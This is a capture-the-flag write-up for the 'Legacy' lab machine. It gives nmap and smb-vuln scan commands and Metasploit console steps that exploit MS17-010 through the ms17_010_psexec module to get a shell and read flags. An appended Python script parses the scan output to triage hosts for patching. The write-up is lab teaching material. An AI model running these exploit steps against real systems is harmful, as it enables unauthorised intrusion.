Jacob Shodd
Legacy

Last updated 3 years ago

Initial Enumeration

Like any other target, we'll start off with a quick port scan to see what we're working with:

nmap -sV 10.10.10.4

[Image: Initial Nmap Scan]

Looking at this output it's safe to say SMB is the target here. Let's take a closer look at this service using some NSE scripts:

nmap -p 139,445 --script='smb-vuln*' 10.10.10.4

[Image: SMB Vulnerability Scan]

Bingo, now we just have to find ourselves an exploit. In the interest of time, we'll just use Metasploit to exploit this vulnerability. I originally intended to show how to do this manually, but due to the older version of Windows this box is running, I ran into a lot of issues. For a non-Metasploit look at MS17-010, be sure to take a look at my write-up on Blue. The first thing we'll do is start our msfconsole and validate that this exploit will work on this target:

# starting msfconsole
msfconsole

# the following happens inside the console:
use exploit/windows/smb/ms17_010_psexec
set RHOST 10.10.10.4
check

[Image: MSF Exploit Validation]

Exploitation

Exploitation from here on is pretty simple. So simple in fact that it just takes typing one word: exploit. While I really prefer to not use Metasploit for learning purposes, I can't deny how convenient it makes common exploits like this:

[Image: Executing the exploit]

With this we can either grab the flags using meterpreter commands, or spawn a shell with the command shell. With this we are able to read the flags:

[Image: Flags]
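Added example (not part of the original writeup): a small Python parser for triaging the output of the smb-vuln* NSE scan from Initial Enumeration across several hosts, treating any result without an explicit State line as inconclusive rather than clean. The sample output, the 192.0.2.x hosts and the function names are constructed for illustration.

```python
import re

# Constructed sample of nmap normal output for an smb-vuln* scan.
# The hosts are documentation addresses, not the box from this writeup.
SAMPLE = """\
Nmap scan report for 192.0.2.10
Host script results:
|_smb-vuln-ms10-061: ERROR: Script execution failed (use -d to debug)
| smb-vuln-ms17-010:
|   VULNERABLE:
|     State: VULNERABLE
|_    Risk factor: HIGH

Nmap scan report for 192.0.2.11
Host script results:
| smb-vuln-ms17-010:
|   NOT VULNERABLE:
|_    State: NOT VULNERABLE
"""

HOST_RE = re.compile(r"^Nmap scan report for (\S+)")
SCRIPT_RE = re.compile(r"^\|[_ ]\s*(smb-vuln-[\w-]+):\s*(.*)$")
STATE_RE = re.compile(r"^\|[_ ]?\s+State:\s*(.+?)\s*$")

def parse_smb_vuln(text):
    """Return {host: {script: raw result}}; a State line overrides the header text."""
    results, host, script = {}, None, None
    for line in text.splitlines():
        if (m := HOST_RE.match(line)):
            host, script = m.group(1), None
            results[host] = {}
        elif host and (m := SCRIPT_RE.match(line)):
            script = m.group(1)
            results[host][script] = m.group(2).strip()
        elif script and (m := STATE_RE.match(line)):
            results[host][script] = m.group(1)
    return results

def classify(raw):
    # Only an explicit "NOT VULNERABLE" state counts as clean; errors, bare
    # values and empty results are inconclusive and need a re-scan.
    s = raw.upper()
    if s.startswith("NOT VULNERABLE"):
        return "ok"
    return "patch" if "VULNERABLE" in s else "recheck"

def triage(text):
    return {h: {s: classify(v) for s, v in r.items()}
            for h, r in parse_smb_vuln(text).items()}
```

Feed it saved scan output, for example from `nmap -oN`, and review every "recheck" entry before treating a host as patched.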